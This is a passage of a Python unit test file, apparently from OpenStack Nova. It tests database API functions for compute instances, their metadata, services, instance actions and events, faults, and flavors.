self.assertEqual('baz', system_meta['original_image_ref'])
def test_delete_instance_metadata_on_instance_destroy(self):
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('foo', instance_meta['host'])
self.assertEqual('meow', instance_meta['key1'])
db.instance_destroy(ctxt, instance['uuid'])
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
# Make sure instance metadata is deleted as well
self.assertEqual({}, instance_meta)
def test_delete_instance_faults_on_instance_destroy(self):
ctxt = context.get_admin_context()
uuid = str(stdlib_uuid.uuid4())
# Create faults
db.instance_create(ctxt, {'uuid': uuid})
fault_values = {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': 404,
'host': 'localhost'
}
fault = db.instance_fault_create(ctxt, fault_values)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
db.instance_destroy(ctxt, uuid)
faults = db.instance_fault_get_by_instance_uuids(ctxt, [uuid])
# Make sure instance faults is deleted as well
self.assertEqual(0, len(faults[uuid]))
def test_instance_update_with_and_get_original(self):
instance = self.create_instance_with_args(vm_state='building')
(old_ref, new_ref) = db.instance_update_and_get_original(self.ctxt,
instance['uuid'], {'vm_state': 'needscoffee'})
self.assertEqual('building', old_ref['vm_state'])
self.assertEqual('needscoffee', new_ref['vm_state'])
def test_instance_update_and_get_original_metadata(self):
instance = self.create_instance_with_args()
columns_to_join = ['metadata']
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'vm_state': 'needscoffee'},
columns_to_join=columns_to_join)
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(new_ref['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_update_and_get_original_metadata_none_join(self):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
meta = utils.metadata_to_dict(new_ref['metadata'])
self.assertEqual(meta, {'mk1': 'mv3'})
def test_instance_update_and_get_original_no_conflict_on_session(self):
session = get_session()
# patch get_session so that we may inspect it outside of the
# method; once enginefacade is implemented, this can be simplified
with mock.patch("nova.db.sqlalchemy.api.get_session", lambda: session):
instance = self.create_instance_with_args()
(old_ref, new_ref) = db.instance_update_and_get_original(
self.ctxt, instance['uuid'], {'metadata': {'mk1': 'mv3'}})
# test some regular persisted fields
self.assertEqual(old_ref.uuid, new_ref.uuid)
self.assertEqual(old_ref.project_id, new_ref.project_id)
# after a copy operation, we can assert:
# 1. the two states have their own InstanceState
old_insp = inspect(old_ref)
new_insp = inspect(new_ref)
self.assertNotEqual(old_insp, new_insp)
# 2. only one of the objects is still in our Session
self.assertIs(new_insp.session, session)
self.assertIsNone(old_insp.session)
# 3. The "new" object remains persistent and ready
# for updates
self.assertTrue(new_insp.persistent)
# 4. the "old" object is detached from this Session.
self.assertTrue(old_insp.detached)
def test_instance_update_unique_name(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
inst1 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name1')
inst2 = self.create_instance_with_args(context=context1,
project_id='p1',
hostname='fake_name2')
inst3 = self.create_instance_with_args(context=context2,
project_id='p2',
hostname='fake_name3')
# osapi_compute_unique_server_name_scope is unset so this should work:
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name2'})
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_name1'})
# With scope 'global' any duplicate should fail.
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
db.instance_update,
context1,
inst2['uuid'],
{'hostname': 'fake_name1'})
self.assertRaises(exception.InstanceExists,
db.instance_update,
context2,
inst3['uuid'],
{'hostname': 'fake_name1'})
# But we should definitely be able to update our name if we aren't
# really changing it.
db.instance_update(context1, inst1['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists, db.instance_update,
context1, inst2['uuid'], {'hostname': 'fake_NAME'})
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
db.instance_update(context2, inst3['uuid'], {'hostname': 'fake_NAME'})
def _test_instance_update_updates_metadata(self, metadata_type):
instance = self.create_instance_with_args()
def set_and_check(meta):
inst = db.instance_update(self.ctxt, instance['uuid'],
{metadata_type: dict(meta)})
_meta = utils.metadata_to_dict(inst[metadata_type])
self.assertEqual(meta, _meta)
meta = {'speed': '88', 'units': 'MPH'}
set_and_check(meta)
meta['gigawatts'] = '1.21'
set_and_check(meta)
del meta['gigawatts']
set_and_check(meta)
self.ctxt.read_deleted = 'yes'
self.assertNotIn('gigawatts',
db.instance_system_metadata_get(self.ctxt, instance.uuid))
def test_security_group_in_use(self):
db.instance_create(self.ctxt, dict(host='foo'))
def test_instance_update_updates_system_metadata(self):
# Ensure that system_metadata is updated during instance_update
self._test_instance_update_updates_metadata('system_metadata')
def test_instance_update_updates_metadata(self):
# Ensure that metadata is updated during instance_update
self._test_instance_update_updates_metadata('metadata')
def test_instance_floating_address_get_all(self):
ctxt = context.get_admin_context()
instance1 = db.instance_create(ctxt, {'host': 'h1', 'hostname': 'n1'})
instance2 = db.instance_create(ctxt, {'host': 'h2', 'hostname': 'n2'})
fixed_addresses = ['1.1.1.1', '1.1.1.2', '1.1.1.3']
float_addresses = ['2.1.1.1', '2.1.1.2', '2.1.1.3']
instance_uuids = [instance1['uuid'], instance1['uuid'],
instance2['uuid']]
for fixed_addr, float_addr, instance_uuid in zip(fixed_addresses,
float_addresses,
instance_uuids):
db.fixed_ip_create(ctxt, {'address': fixed_addr,
'instance_uuid': instance_uuid})
fixed_id = db.fixed_ip_get_by_address(ctxt, fixed_addr)['id']
db.floating_ip_create(ctxt,
{'address': float_addr,
'fixed_ip_id': fixed_id})
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[0])
self.assertEqual(set(float_addresses[:2]), set(real_float_addresses))
real_float_addresses = \
db.instance_floating_address_get_all(ctxt, instance_uuids[2])
self.assertEqual(set([float_addresses[2]]), set(real_float_addresses))
self.assertRaises(exception.InvalidUUID,
db.instance_floating_address_get_all,
ctxt, 'invalid_uuid')
def test_instance_stringified_ips(self):
instance = self.create_instance_with_args()
instance = db.instance_update(
self.ctxt, instance['uuid'],
{'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1')})
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
instance = db.instance_get_by_uuid(self.ctxt, instance['uuid'])
self.assertIsInstance(instance['access_ip_v4'], six.string_types)
self.assertIsInstance(instance['access_ip_v6'], six.string_types)
@mock.patch('nova.db.sqlalchemy.api._check_instance_exists',
return_value=None)
def test_instance_destroy(self, mock_check_inst_exists):
ctxt = context.get_admin_context()
values = {
'metadata': {'key': 'value'},
'system_metadata': {'key': 'value'}
}
inst_uuid = self.create_instance_with_args(**values)['uuid']
db.instance_tag_set(ctxt, inst_uuid, ['tag1', 'tag2'])
db.instance_destroy(ctxt, inst_uuid)
self.assertRaises(exception.InstanceNotFound,
db.instance_get, ctxt, inst_uuid)
self.assertIsNone(db.instance_info_cache_get(ctxt, inst_uuid))
self.assertEqual({}, db.instance_metadata_get(ctxt, inst_uuid))
self.assertEqual([], db.instance_tag_get_by_instance_uuid(
ctxt, inst_uuid))
ctxt.read_deleted = 'yes'
self.assertEqual(values['system_metadata'],
db.instance_system_metadata_get(ctxt, inst_uuid))
def test_instance_destroy_already_destroyed(self):
ctxt = context.get_admin_context()
instance = self.create_instance_with_args()
db.instance_destroy(ctxt, instance['uuid'])
self.assertRaises(exception.InstanceNotFound,
db.instance_destroy, ctxt, instance['uuid'])
class InstanceMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_metadata_* methods."""
def setUp(self):
super(InstanceMetadataTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_instance_metadata_get(self):
instance = db.instance_create(self.ctxt, {'metadata':
{'key': 'value'}})
self.assertEqual({'key': 'value'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_delete(self):
instance = db.instance_create(self.ctxt,
{'metadata': {'key': 'val',
'key1': 'val1'}})
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'key1')
self.assertEqual({'key': 'val'}, db.instance_metadata_get(
self.ctxt, instance['uuid']))
def test_instance_metadata_update(self):
instance = db.instance_create(self.ctxt, {'host': 'h1',
'project_id': 'p1', 'metadata': {'key': 'value'}})
# This should add new key/value pair
db.instance_metadata_update(self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
# This should leave only one key/value pair
db.instance_metadata_update(self.ctxt, instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_metadata_get(self.ctxt, instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
class InstanceExtraTestCase(test.TestCase):
def setUp(self):
super(InstanceExtraTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, {})
def test_instance_extra_get_by_uuid_instance_create(self):
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertIsNotNone(inst_extra)
def test_instance_extra_update_by_uuid(self):
db.instance_extra_update_by_uuid(self.ctxt, self.instance['uuid'],
{'numa_topology': 'changed'})
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertEqual('changed', inst_extra.numa_topology)
def test_instance_extra_update_by_uuid_and_create(self):
sqlalchemy_api.model_query(self.ctxt, models.InstanceExtra).\
filter_by(instance_uuid=self.instance['uuid']).\
delete()
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertIsNone(inst_extra)
db.instance_extra_update_by_uuid(self.ctxt, self.instance['uuid'],
{'numa_topology': 'changed'})
inst_extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'])
self.assertEqual('changed', inst_extra.numa_topology)
def test_instance_extra_get_with_columns(self):
extra = db.instance_extra_get_by_instance_uuid(
self.ctxt, self.instance['uuid'],
columns=['numa_topology', 'vcpu_model'])
self.assertRaises(SQLAlchemyError,
extra.__getitem__, 'pci_requests')
self.assertIn('numa_topology', extra)
self.assertIn('vcpu_model', extra)
class ServiceTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ServiceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'host': 'fake_host',
'binary': 'fake_binary',
'topic': 'fake_topic',
'report_count': 3,
'disabled': False,
'forced_down': False
}
def _create_service(self, values):
v = self._get_base_values()
v.update(values)
return db.service_create(self.ctxt, v)
def test_service_create(self):
service = self._create_service({})
self.assertIsNotNone(service['id'])
for key, value in self._get_base_values().items():
self.assertEqual(value, service[key])
def test_service_create_disabled(self):
self.flags(enable_new_services=False)
service = self._create_service({})
self.assertTrue(service['disabled'])
def test_service_destroy(self):
service1 = self._create_service({})
service2 = self._create_service({'host': 'fake_host2'})
db.service_destroy(self.ctxt, service1['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, service1['id'])
self._assertEqualObjects(db.service_get(self.ctxt, service2['id']),
service2, ignored_keys=['compute_node'])
def test_service_update(self):
service = self._create_service({})
new_values = {
'host': 'fake_host1',
'binary': 'fake_binary1',
'topic': 'fake_topic1',
'report_count': 4,
'disabled': True
}
db.service_update(self.ctxt, service['id'], new_values)
updated_service = db.service_get(self.ctxt, service['id'])
for key, value in new_values.items():
self.assertEqual(value, updated_service[key])
def test_service_update_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_update, self.ctxt, 100500, {})
def test_service_update_with_set_forced_down(self):
service = self._create_service({})
db.service_update(self.ctxt, service['id'], {'forced_down': True})
updated_service = db.service_get(self.ctxt, service['id'])
self.assertTrue(updated_service['forced_down'])
def test_service_update_with_unset_forced_down(self):
service = self._create_service({'forced_down': True})
db.service_update(self.ctxt, service['id'], {'forced_down': False})
updated_service = db.service_get(self.ctxt, service['id'])
self.assertFalse(updated_service['forced_down'])
def test_service_get(self):
service1 = self._create_service({})
self._create_service({'host': 'some_other_fake_host'})
real_service1 = db.service_get(self.ctxt, service1['id'])
self._assertEqualObjects(service1, real_service1,
ignored_keys=['compute_node'])
def test_service_get_not_found_exception(self):
self.assertRaises(exception.ServiceNotFound,
db.service_get, self.ctxt, 100500)
def test_service_get_by_host_and_topic(self):
service1 = self._create_service({'host': 'host1', 'topic': 'topic1'})
self._create_service({'host': 'host2', 'topic': 'topic2'})
real_service1 = db.service_get_by_host_and_topic(self.ctxt,
host='host1',
topic='topic1')
self._assertEqualObjects(service1, real_service1)
def test_service_get_by_host_and_binary(self):
service1 = self._create_service({'host': 'host1', 'binary': 'foo'})
self._create_service({'host': 'host2', 'binary': 'bar'})
real_service1 = db.service_get_by_host_and_binary(self.ctxt,
host='host1',
binary='foo')
self._assertEqualObjects(service1, real_service1)
def test_service_get_by_host_and_binary_raises(self):
self.assertRaises(exception.HostBinaryNotFound,
db.service_get_by_host_and_binary, self.ctxt,
host='host1', binary='baz')
def test_service_get_all(self):
values = [
{'host': 'host1', 'topic': 'topic1'},
{'host': 'host2', 'topic': 'topic2'},
{'disabled': True}
]
services = [self._create_service(vals) for vals in values]
disabled_services = [services[-1]]
non_disabled_services = services[:-1]
compares = [
(services, db.service_get_all(self.ctxt)),
(disabled_services, db.service_get_all(self.ctxt, True)),
(non_disabled_services, db.service_get_all(self.ctxt, False))
]
for comp in compares:
self._assertEqualListsOfObjects(*comp)
def test_service_get_all_by_topic(self):
values = [
{'host': 'host1', 'topic': 't1'},
{'host': 'host2', 'topic': 't1'},
{'disabled': True, 'topic': 't1'},
{'host': 'host3', 'topic': 't2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_topic(self.ctxt, 't1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_all_by_binary(self):
values = [
{'host': 'host1', 'binary': 'b1'},
{'host': 'host2', 'binary': 'b1'},
{'disabled': True, 'binary': 'b1'},
{'host': 'host3', 'binary': 'b2'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_binary(self.ctxt, 'b1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_all_by_host(self):
values = [
{'host': 'host1', 'topic': 't11', 'binary': 'b11'},
{'host': 'host1', 'topic': 't12', 'binary': 'b12'},
{'host': 'host2', 'topic': 't1'},
{'host': 'host3', 'topic': 't1'}
]
services = [self._create_service(vals) for vals in values]
expected = services[:2]
real = db.service_get_all_by_host(self.ctxt, 'host1')
self._assertEqualListsOfObjects(expected, real)
def test_service_get_by_compute_host(self):
values = [
{'host': 'host1', 'binary': 'nova-compute'},
{'host': 'host2', 'binary': 'nova-scheduler'},
{'host': 'host3', 'binary': 'nova-compute'}
]
services = [self._create_service(vals) for vals in values]
real_service = db.service_get_by_compute_host(self.ctxt, 'host1')
self._assertEqualObjects(services[0], real_service)
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_get_by_compute_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.service_get_by_compute_host,
self.ctxt, 'non-exists-host')
def test_service_binary_exists_exception(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'topic': 'top1'})
self.assertRaises(exception.ServiceBinaryExists, db.service_create,
self.ctxt, values)
def test_service_topic_exists_exceptions(self):
db.service_create(self.ctxt, self._get_base_values())
values = self._get_base_values()
values.update({'binary': 'bin1'})
self.assertRaises(exception.ServiceTopicExists, db.service_create,
self.ctxt, values)
class BaseInstanceTypeTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(BaseInstanceTypeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.user_ctxt = context.RequestContext('user', 'user')
def _get_base_values(self):
return {
'name': 'fake_name',
'memory_mb': 512,
'vcpus': 1,
'root_gb': 10,
'ephemeral_gb': 10,
'flavorid': 'fake_flavor',
'swap': 0,
'rxtx_factor': 0.5,
'vcpu_weight': 1,
'disabled': False,
'is_public': True
}
def _create_flavor(self, values, projects=None):
v = self._get_base_values()
v.update(values)
return db.flavor_create(self.ctxt, v, projects)
class InstanceActionTestCase(test.TestCase, ModelsObjectComparatorMixin):
IGNORED_FIELDS = [
'id',
'created_at',
'updated_at',
'deleted_at',
'deleted'
]
def setUp(self):
super(InstanceActionTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_action_values(self, uuid, action='run_instance',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
db.instance_create(ctxt, {'uuid': uuid})
values = {
'action': action,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'user_id': ctxt.user_id,
'project_id': ctxt.project_id,
'start_time': timeutils.utcnow(),
'message': 'action-message'
}
if extra is not None:
values.update(extra)
return values
def _create_event_values(self, uuid, event='schedule',
ctxt=None, extra=None):
if ctxt is None:
ctxt = self.ctxt
values = {
'event': event,
'instance_uuid': uuid,
'request_id': ctxt.request_id,
'start_time': timeutils.utcnow(),
'host': 'fake-host',
'details': 'fake-details',
}
if extra is not None:
values.update(extra)
return values
def _assertActionSaved(self, action, uuid):
"""Retrieve the action to ensure it was successfully added."""
actions = db.actions_get(self.ctxt, uuid)
self.assertEqual(1, len(actions))
self._assertEqualObjects(action, actions[0])
def _assertActionEventSaved(self, event, action_id):
# Retrieve the event to ensure it was successfully added
events = db.action_events_get(self.ctxt, action_id)
self.assertEqual(1, len(events))
self._assertEqualObjects(event, events[0],
['instance_uuid', 'request_id'])
def test_instance_action_start(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
ignored_keys = self.IGNORED_FIELDS + ['finish_time']
self._assertEqualObjects(action_values, action, ignored_keys)
self._assertActionSaved(action, uuid)
def test_instance_action_finish(self):
"""Create an instance action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
db.action_start(self.ctxt, action_values)
action_values['finish_time'] = timeutils.utcnow()
action = db.action_finish(self.ctxt, action_values)
self._assertEqualObjects(action_values, action, self.IGNORED_FIELDS)
self._assertActionSaved(action, uuid)
def test_instance_action_finish_without_started_event(self):
"""Create an instance finish action."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action_values['finish_time'] = timeutils.utcnow()
self.assertRaises(exception.InstanceActionNotFound, db.action_finish,
self.ctxt, action_values)
def test_instance_actions_get_by_instance(self):
"""Ensure we can get actions by UUID."""
uuid1 = str(stdlib_uuid.uuid4())
expected = []
action_values = self._create_action_values(uuid1)
action = db.action_start(self.ctxt, action_values)
expected.append(action)
action_values['action'] = 'resize'
action = db.action_start(self.ctxt, action_values)
expected.append(action)
# Create some extra actions
uuid2 = str(stdlib_uuid.uuid4())
ctxt2 = context.get_admin_context()
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
# Retrieve the action to ensure it was successfully added
actions = db.actions_get(self.ctxt, uuid1)
self._assertEqualListsOfObjects(expected, actions)
def test_instance_actions_get_are_in_order(self):
"""Ensure retrived actions are in order."""
uuid1 = str(stdlib_uuid.uuid4())
extra = {
'created_at': timeutils.utcnow()
}
action_values = self._create_action_values(uuid1, extra=extra)
action1 = db.action_start(self.ctxt, action_values)
action_values['action'] = 'delete'
action2 = db.action_start(self.ctxt, action_values)
actions = db.actions_get(self.ctxt, uuid1)
self.assertEqual(2, len(actions))
self._assertEqualOrderedListOfObjects([action2, action1], actions)
def test_instance_action_get_by_instance_and_action(self):
"""Ensure we can get an action by instance UUID and action id."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid1)
db.action_start(self.ctxt, action_values)
request_id = action_values['request_id']
# NOTE(rpodolyaka): ensure we use a different req id for the 2nd req
action_values['action'] = 'resize'
action_values['request_id'] = 'req-00000000-7522-4d99-7ff-111111111111'
db.action_start(self.ctxt, action_values)
action_values = self._create_action_values(uuid2, 'reboot', ctxt2)
db.action_start(ctxt2, action_values)
db.action_start(ctxt2, action_values)
action = db.action_get_by_request_id(self.ctxt, uuid1, request_id)
self.assertEqual('run_instance', action['action'])
self.assertEqual(self.ctxt.request_id, action['request_id'])
def test_instance_action_event_start(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
event_values = self._create_event_values(uuid)
event = db.action_event_start(self.ctxt, event_values)
# self.fail(self._dict_from_object(event, None))
event_values['action_id'] = action['id']
ignored = self.IGNORED_FIELDS + ['finish_time', 'traceback', 'result']
self._assertEqualObjects(event_values, event, ignored)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_event_start_without_action(self):
"""Create an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = self._create_event_values(uuid)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_start, self.ctxt, event_values)
def test_instance_action_event_finish_without_started_event(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionEventNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_without_action(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
self.assertRaises(exception.InstanceActionNotFound,
db.action_event_finish, self.ctxt, event_values)
def test_instance_action_event_finish_success(self):
"""Finish an instance action event."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertNotEqual('Error', action['message'])
def test_instance_action_event_finish_error(self):
"""Finish an instance action event with an error."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
db.action_event_start(self.ctxt, self._create_event_values(uuid))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Error'
}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_finish(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertEqual('Error', action['message'])
def test_instance_action_and_event_start_string_time(self):
"""Create an instance action and event with a string start_time."""
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
event_values = {'start_time': timeutils.strtime(timeutils.utcnow())}
event_values = self._create_event_values(uuid, extra=event_values)
event = db.action_event_start(self.ctxt, event_values)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_events_get_are_in_order(self):
"""Ensure retrived action events are in order."""
uuid1 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
extra1 = {
'created_at': timeutils.utcnow()
}
extra2 = {
'created_at': timeutils.utcnow() + datetime.timedelta(seconds=5)
}
event_val1 = self._create_event_values(uuid1, 'schedule', extra=extra1)
event_val2 = self._create_event_values(uuid1, 'run', extra=extra1)
event_val3 = self._create_event_values(uuid1, 'stop', extra=extra2)
event1 = db.action_event_start(self.ctxt, event_val1)
event2 = db.action_event_start(self.ctxt, event_val2)
event3 = db.action_event_start(self.ctxt, event_val3)
events = db.action_events_get(self.ctxt, action['id'])
self.assertEqual(3, len(events))
self._assertEqualOrderedListOfObjects([event3, event2, event1], events,
['instance_uuid', 'request_id'])
def test_instance_action_event_get_by_id(self):
"""Get a specific instance action event."""
ctxt2 = context.get_admin_context()
uuid1 = str(stdlib_uuid.uuid4())
uuid2 = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt,
self._create_action_values(uuid1))
db.action_start(ctxt2,
self._create_action_values(uuid2, 'reboot', ctxt2))
event = db.action_event_start(self.ctxt,
self._create_event_values(uuid1))
event_values = self._create_event_values(uuid2, 'reboot', ctxt2)
db.action_event_start(ctxt2, event_values)
# Retrieve the event to ensure it was successfully added
saved_event = db.action_event_get_by_id(self.ctxt,
action['id'],
event['id'])
self._assertEqualObjects(event, saved_event,
['instance_uuid', 'request_id'])
def test_instance_action_event_start_with_different_request_id(self):
uuid = str(stdlib_uuid.uuid4())
action_values = self._create_action_values(uuid)
action = db.action_start(self.ctxt, action_values)
# init_host case
fake_admin_context = context.get_admin_context()
event_values = self._create_event_values(uuid, ctxt=fake_admin_context)
event = db.action_event_start(fake_admin_context, event_values)
event_values['action_id'] = action['id']
ignored = self.IGNORED_FIELDS + ['finish_time', 'traceback', 'result']
self._assertEqualObjects(event_values, event, ignored)
self._assertActionEventSaved(event, action['id'])
def test_instance_action_event_finish_with_different_request_id(self):
uuid = str(stdlib_uuid.uuid4())
action = db.action_start(self.ctxt, self._create_action_values(uuid))
# init_host case
fake_admin_context = context.get_admin_context()
db.action_event_start(fake_admin_context, self._create_event_values(
uuid, ctxt=fake_admin_context))
event_values = {
'finish_time': timeutils.utcnow() + datetime.timedelta(seconds=5),
'result': 'Success'
}
event_values = self._create_event_values(uuid, ctxt=fake_admin_context,
extra=event_values)
event = db.action_event_finish(fake_admin_context, event_values)
self._assertActionEventSaved(event, action['id'])
action = db.action_get_by_request_id(self.ctxt, uuid,
self.ctxt.request_id)
self.assertNotEqual('Error', action['message'])
class InstanceFaultTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(InstanceFaultTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_fault_values(self, uuid, code=404):
return {
'message': 'message',
'details': 'detail',
'instance_uuid': uuid,
'code': code,
'host': 'localhost'
}
def test_instance_fault_create(self):
"""Ensure we can create an instance fault."""
uuid = str(stdlib_uuid.uuid4())
# Ensure no faults registered for this instance
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(0, len(faults[uuid]))
# Create a fault
fault_values = self._create_fault_values(uuid)
db.instance_create(self.ctxt, {'uuid': uuid})
fault = db.instance_fault_create(self.ctxt, fault_values)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(fault_values, fault, ignored_keys)
# Retrieve the fault to ensure it was successfully added
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
self.assertEqual(1, len(faults[uuid]))
self._assertEqualObjects(fault, faults[uuid][0])
def test_instance_fault_get_by_instance(self):
"""Ensure we can retrieve faults for instance."""
uuids = [str(stdlib_uuid.uuid4()), str(stdlib_uuid.uuid4())]
fault_codes = [404, 500]
expected = {}
# Create faults
for uuid in uuids:
db.instance_create(self.ctxt, {'uuid': uuid})
expected[uuid] = []
for code in fault_codes:
fault_values = self._create_fault_values(uuid, code)
fault = db.instance_fault_create(self.ctxt, fault_values)
expected[uuid].append(fault)
# Ensure faults are saved
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, uuids)
self.assertEqual(len(expected), len(faults))
for uuid in uuids:
self._assertEqualListsOfObjects(expected[uuid], faults[uuid])
def test_instance_faults_get_by_instance_uuids_no_faults(self):
uuid = str(stdlib_uuid.uuid4())
# None should be returned when no faults exist.
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
expected = {uuid: []}
self.assertEqual(expected, faults)
def test_instance_faults_get_by_instance_uuids_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [])
self.assertEqual({}, faults)
class InstanceTypeTestCase(BaseInstanceTypeTestCase):
def test_flavor_create(self):
flavor = self._create_flavor({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self.assertIsNotNone(flavor['id'])
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
def test_flavor_create_with_projects(self):
projects = ['fake-project1', 'fake-project2']
flavor = self._create_flavor({}, projects + ['fake-project2'])
access = db.flavor_access_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self.assertEqual(projects, [x.project_id for x in access])
def test_flavor_destroy(self):
specs1 = {'a': '1', 'b': '2'}
flavor1 = self._create_flavor({'name': 'name1', 'flavorid': 'a1',
'extra_specs': specs1})
specs2 = {'c': '4', 'd': '3'}
flavor2 = self._create_flavor({'name': 'name2', 'flavorid': 'a2',
'extra_specs': specs2})
db.flavor_destroy(self.ctxt, 'name1')
self.assertRaises(exception.FlavorNotFound,
